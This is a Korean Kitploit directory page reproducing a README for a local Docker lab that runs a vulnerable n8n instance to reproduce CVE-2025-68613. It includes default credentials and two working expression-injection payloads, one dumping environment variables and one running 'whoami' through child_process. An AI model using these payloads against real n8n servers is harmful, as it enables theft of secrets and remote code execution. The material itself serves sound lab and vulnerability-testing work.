Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-68613-n8n-lab — CVE-2025-68613 분석 | Kitploit
도구/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

CVE-2025-68613 분석

저장소 보기
39개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-68613 로컬 n8n 랩

이 저장소는 CVE-2025-68613의 로컬 테스트를 위해 취약한 n8n 인스턴스를 실행하는 간단한 Docker Compose 구성을 제공합니다.

요구 사항

  • Docker Desktop 또는 Docker Engine
  • Docker Compose v2

빠른 시작

  1. 컨테이너를 시작합니다:

    docker compose up -d
    
  2. 브라우저에서 n8n을 엽니다:

    • http://localhost:5678
  3. docker-compose.yml에 설정된 기본 자격 증명으로 로그인합니다:

    • 사용자 이름: admin
    • 비밀번호: password

중지 및 정리

docker compose down

면책 조항 및 안전

이 환경은 로컬, 격리된 테스트 전용입니다. 이 인스턴스를 공개 인터넷이나 신뢰할 수 없는 네트워크에 노출하지 마십시오. 프라이빗 로컬 전용 네트워크 세그먼트에 두고 프로덕션 시스템과 분리하십시오. 사용에 따른 책임은 본인에게 있습니다.

취약점 검증 (개념 증명)

컨테이너가 실행되면 http://localhost:5678에서 n8n 인터페이스에 접근할 수 있습니다. 취약점을 테스트하려면 표현식 필드에 악성 JavaScript 페이로드를 주입합니다.

재현 단계:

  1. 로그인: 대시보드에 접근합니다(기본 인증을 설정한 경우 제공된 자격 증명을 사용하고, 그렇지 않으면 새 소유자 계정을 만듭니다).
  2. 워크플로우 생성: "Add Workflow"를 클릭하거나 https://n8n.example.com/workflow/new로 이동합니다.
  3. 노드 추가: "Set" 노드를 추가합니다.
  4. 페이로드 주입: Set 노드의 "Value" 필드에서(가능하면 "Expression" 모드로 전환했는지 확인하거나, n8n이 표현식으로 해석하는 구문을 그대로 붙여넣으십시오) 다음 페이로드 중 하나를 입력합니다:

테스트 1: 환경 변수 유출 이 페이로드는 종종 비밀을 포함하는 프로세스 환경 변수에 접근을 시도합니다.

{{ (function() { return this.process.env; })() }}

환경 변수 유출

테스트 2: 원격 코드 실행(RCE) 이 페이로드는 시스템 명령(예: whoami)을 실행하기 위해 child_process 모듈을 로드하려고 시도합니다.

{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

id 명령에 대한 RCE 예제

예상 결과: 환경이 취약한 경우 Set 노드의 "Output" 패널에 명령 실행 결과(예: root 또는 n8n 사용자) 또는 환경 변수가 포함된 JSON 객체가 표시됩니다. 인스턴스가 패치된 경우(예: 1.122.0+ 버전) 샌드박스는 빈 객체나 오류를 반환합니다.

도구 다운로드